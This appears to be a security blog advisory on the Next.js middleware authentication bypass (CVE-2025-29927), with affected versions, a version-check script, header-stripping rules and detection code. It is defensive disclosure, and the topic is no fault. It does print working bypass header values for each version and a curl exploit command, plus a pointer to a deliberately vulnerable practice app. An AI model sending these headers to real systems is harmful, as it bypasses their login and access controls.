The Critical Severity Vulnerability in the Next.js Framework (CVE-2025-29927)

Critical Next.js Vulnerability

One of the most popular JavaScript frameworks, Next.js, has a critical security vulnerability with a CVSS base score of 9.1 from NIST. Next.js is a React framework that provides a structured approach and additional features for building web applications, including server-side rendering and static site generation, built on top of the React library.

The framework is used by big tech companies and small startups alike because of its performance, scalability, and developer-friendly features.

The security researcher Rachid discovered a critical vulnerability in Next.js Middleware. It allows authentication bypass, DoS (denial of service), and cache poisoning using maliciously crafted requests.

The framework has 131K stars on GitHub and is currently downloaded more than 9.4 million times per week. The following Next.js versions are affected by this vulnerability.

If your organization uses one of them, upgrade to the corresponding patched version.

  1. For Next.js 15.x, this issue is fixed in 15.2.3.
  2. For Next.js 14.x, this issue is fixed in 14.2.25.
  3. All Next.js versions starting from 11.1.4 up to and including 13.5.6 are affected by this vulnerability.
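As an added example (not from the article), here is a small JavaScript check that encodes exactly the three version ranges listed above and reports whether a pinned Next.js version is affected, fixed, or simply not covered by that list. The package.json contents and the function names are constructed for the demo; a prerelease suffix such as -canary.1 is stripped before comparison, so canary builds should still be checked against the upstream advisory.

```javascript
// Added example (not from the article): classify a Next.js version string
// against the affected ranges the article lists for CVE-2025-29927.
// Assumed ranges (taken from the article's list):
//   11.1.4 <= v <= 13.5.6          affected
//   14.0.0 <= v <  14.2.25         affected (fixed in 14.2.25)
//   15.0.0 <= v <  15.2.3          affected (fixed in 15.2.3)
// Anything outside these ranges is reported as "not listed", not as safe.

// Parse "15.2.2", "^14.1.0", "~13.4.0" or "15.2.3-canary.1" into [major, minor, patch].
// Range operators are dropped because the check should be run on the version that
// is actually installed (package-lock.json or `npx next --version`). The prerelease
// suffix is dropped too, which is a simplification, not semver-exact ordering.
function parseVersion(spec) {
  const cleaned = String(spec).trim().replace(/^[\^~=v]+/, "").split(/[-+]/)[0];
  const parts = cleaned.split(".").map((p) => Number.parseInt(p, 10));
  if (parts.length !== 3 || parts.some((n) => Number.isNaN(n) || n < 0)) {
    throw new Error(`unrecognised version string: ${spec}`);
  }
  return parts;
}

// Compare two [major, minor, patch] triples: -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Inclusive lower bound; upper bound inclusive or exclusive as flagged.
function inRange(v, lo, hi, hiInclusive) {
  const cmpHi = compareVersions(v, hi);
  return compareVersions(v, lo) >= 0 && (hiInclusive ? cmpHi <= 0 : cmpHi < 0);
}

const AFFECTED_RANGES = [
  { lo: [11, 1, 4], hi: [13, 5, 6], hiInclusive: true },
  { lo: [14, 0, 0], hi: [14, 2, 25], hiInclusive: false },
  { lo: [15, 0, 0], hi: [15, 2, 3], hiInclusive: false },
];

// "affected" | "fixed" | "not listed"
function classify(spec) {
  const v = parseVersion(spec);
  if (AFFECTED_RANGES.some((r) => inRange(v, r.lo, r.hi, r.hiInclusive))) return "affected";
  if (v[0] === 14 && compareVersions(v, [14, 2, 25]) >= 0) return "fixed";
  if (v[0] === 15 && compareVersions(v, [15, 2, 3]) >= 0) return "fixed";
  return "not listed";
}

function isAffected(spec) {
  return classify(spec) === "affected";
}

// Find the pinned "next" version in a parsed package.json and classify it.
function auditPackageJson(pkg) {
  for (const section of ["dependencies", "devDependencies"]) {
    if (pkg[section] && pkg[section].next) {
      const next = pkg[section].next;
      return { next, status: classify(next) };
    }
  }
  return { next: null, status: "not listed" };
}

// Constructed sample package.json for the demo (not a real project).
const samplePackageJson = {
  name: "constructed-sample-app",
  dependencies: { next: "15.2.2", react: "19.0.0" },
};

console.log(auditPackageJson(samplePackageJson));
// → { next: '15.2.2', status: 'affected' }
```

Run it over every package.json (or, better, every lockfile) in your estate; a "not listed" result for a 13.x version above 13.5.6 means the article's table does not cover it, so consult the upstream advisory rather than assuming it is safe.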

How does this Vulnerability Occur?

To understand the technical details of this vulnerability, you first have to understand Middleware. According to the Next.js documentation, Middleware allows you to run code before a request is completed.

Then, based on the incoming request, you can modify the response by rewriting, redirecting, modifying the request or response headers, or responding directly. Middleware runs before cached content and routes are matched.

In simple words, Middleware acts as a checkpoint for your website. Before a request reaches the final destination (like your homepage or a product page), middleware checks the request and decides what to do next. Middleware helps you customize how requests are handled, making your site faster, safer, and more flexible.

Another main job of Middleware is access control. It checks a user's authentication and authorization and verifies their session before letting them in.

For example, a user tries to visit /<Your web app>/dashboard/admin. Middleware jumps in and checks whether they are logged in and have the correct permissions. If everything is in order, it allows them through; otherwise, it redirects them to the login page.

The Security Issue in Next.js

The Next.js framework middleware checks a special header in the web request called x-middleware-subrequest to decide whether it should run. If this header contains the middleware's name, the middleware is skipped, and the request moves forward. On top of that, the middleware's name is predictable.

In older versions, the middleware files had to be named _middleware.ts and placed inside the pages/ folder. By chaining these two facts together, an attacker can bypass the middleware and the login mechanism behind it.

For example, if a request to /dashboard/panel/admin needs to pass through middleware, an attacker has three possible values for the x-middleware-subrequest header:

  • pages/_middleware
  • pages/dashboard/_middleware
  • pages/dashboard/panel/_middleware

The Middleware Vulnerability POC

Multiple Next.js versions are vulnerable, and different project structures need different header values to exploit it:

Pages Router (versions 11.1.4-12.1.x): x-middleware-subrequest: pages/_middleware

App Router (versions 12.2.x-13.x): x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

App Router with /src folder (versions 14.x-15.2.2): x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

A simple payload for version 15.x: running the following curl command bypasses the middleware and gives you access to the page behind the login.

The Exploit (middleware:middleware:middleware:middleware:middleware)

    curl -v -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
        http://localhost:3000/dashboard

If you are looking for a vulnerable app for testing and learning purposes, use this GitHub repo. Follow the steps to deploy the vulnerable app:

    Step 1: git clone https://github.com/Pkhuyar/nextjs-vulnerable-app.git
    Step 2: cd nextjs-vulnerable-app
    Step 3: npm install
    Step 4: npm run dev

The vulnerable web app is now running on http://localhost:3000; open it in the browser to view the application.

Real-World Security Impacts

The vulnerability opens several new attack surfaces in a Next.js web app. If your app is vulnerable, the following real-world scenarios become possible:

Authentication Bypass: An attacker can skip the login page and gain access as another user with a single crafted request. The worst case is an attacker taking over a high-privilege account such as admin.

CSP (Content Security Policy) Bypass: Middleware is also used to set a CSP header as a defence against XSS (cross-site scripting) attacks. When the middleware is skipped, that header is never set, so attackers can execute malicious XSS payloads against the victim.

Cache Poisoning and DoS: The security researcher also reports that in some scenarios this vulnerability can lead to a cache poisoning attack or denial of service.

Geographic Restriction Bypass: Developers use middleware to restrict content by location. Anyone exploiting this vulnerability can bypass that security mechanism as well.

Protecting Your Organisation

The vulnerability was disclosed only recently, so fix your web app as soon as possible. Details of the vulnerability and a working exploit are now public, and cybercriminals are using it against web apps in the wild.

If you use the Next.js framework, protect your organization by following these steps:

Update Next.js: The Next.js team has released a patch for this vulnerability. If you are on one of the vulnerable versions, update your Next.js app immediately.

Use a WAF (Web Application Firewall) to block the malicious header: If you can't update your web app immediately, or don't know whether your version is on the vulnerable list, use a good WAF or reverse proxy to strip the dangerous header before it reaches the app.

For NGINX, clear the header inside the location block that proxies to your Next.js app (an empty value tells proxy_set_header to drop it from the proxied request):

    location / {
        proxy_set_header x-middleware-subrequest "";
    }

For Apache:

    RequestHeader unset x-middleware-subrequest
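The following Node.js snippet is an added example, not part of the article or the Next.js project. It does in application code what the proxy rules above do at the edge: it removes any incoming x-middleware-subrequest header (whatever its casing) before the request is forwarded, and produces a detection record so the attempt can be alerted on. The request objects, the rule name and the IP addresses are constructed for the demo; header keys follow the Node.js http module's lower-cased convention.

```javascript
// Added example (not from the article or the Next.js project): strip the
// x-middleware-subrequest header from inbound requests and emit a detection
// record. Intended for a custom server or proxy that sits in front of Next.js.

const TARGET_HEADER = "x-middleware-subrequest";

// True when the value has the shape of the bypass payloads the article lists:
// a colon-separated list of middleware path names such as "middleware",
// "src/middleware" or "pages/dashboard/_middleware".
function looksLikeBypassPayload(value) {
  const tokens = String(value).split(":").map((t) => t.trim()).filter(Boolean);
  return tokens.length > 0 && tokens.every((t) => /(^|\/)_?middleware$/.test(t));
}

// Remove the header under any casing. Returns a fresh headers object plus the
// removed value (or null), so the caller can forward one and log the other.
function stripSubrequestHeader(headers) {
  const cleaned = {};
  let removed = null;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === TARGET_HEADER) {
      removed = Array.isArray(value) ? value.join(",") : String(value);
    } else {
      cleaned[name] = value;
    }
  }
  return { headers: cleaned, removed };
}

// Inspect one request. Next.js sets this header on its own internal
// sub-requests, so a copy arriving from an external client is suspicious by
// itself (medium); a value matching the known payload shape is rated high.
function inspectRequest(req) {
  const { headers, removed } = stripSubrequestHeader(req.headers);
  if (removed === null) {
    return { sanitizedHeaders: headers, alert: null };
  }
  return {
    sanitizedHeaders: headers,
    alert: {
      rule: "next-middleware-subrequest-header", // constructed rule name
      severity: looksLikeBypassPayload(removed) ? "high" : "medium",
      method: req.method,
      path: req.url,
      source: req.remoteAddress,
      value: removed,
    },
  };
}

// Constructed sample requests (not captured traffic).
const sampleRequests = [
  {
    method: "GET", url: "/dashboard", remoteAddress: "198.51.100.7",
    headers: { host: "app.example", "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware" },
  },
  {
    method: "GET", url: "/dashboard/panel/admin", remoteAddress: "198.51.100.8",
    headers: { host: "app.example", "X-Middleware-Subrequest": "pages/dashboard/panel/_middleware" },
  },
  {
    method: "GET", url: "/", remoteAddress: "203.0.113.5",
    headers: { host: "app.example", accept: "text/html" },
  },
];

const results = sampleRequests.map(inspectRequest);
for (const r of results) {
  console.log(r.alert ? `${r.alert.severity}: ${r.alert.method} ${r.alert.path} from ${r.alert.source}` : "clean");
}
```

Stripping the header only protects requests that actually pass through the sanitizer, so it is a stop-gap; the upgrade remains the fix. The detection record is worth keeping even after patching, because a client sending this header is probing for exactly this weakness.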

Conclusion

This incident reminds us that security is an ongoing process, not a one-time setup that is then done. Even a popular and well-maintained framework can face a critical vulnerability.

We need multiple layers of security to prevent this kind of incident. Use SiteLock Security to add an extra layer: it is a cloud-based security tool that scans your website for malware and vulnerabilities and protects your organization from this type of incident.

One of the famous quotes in the cybersecurity world is, "Never trust user input." Any data from users, including HTTP headers, can be manipulated. Always validate or sanitize input.

Janki Mehta

Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.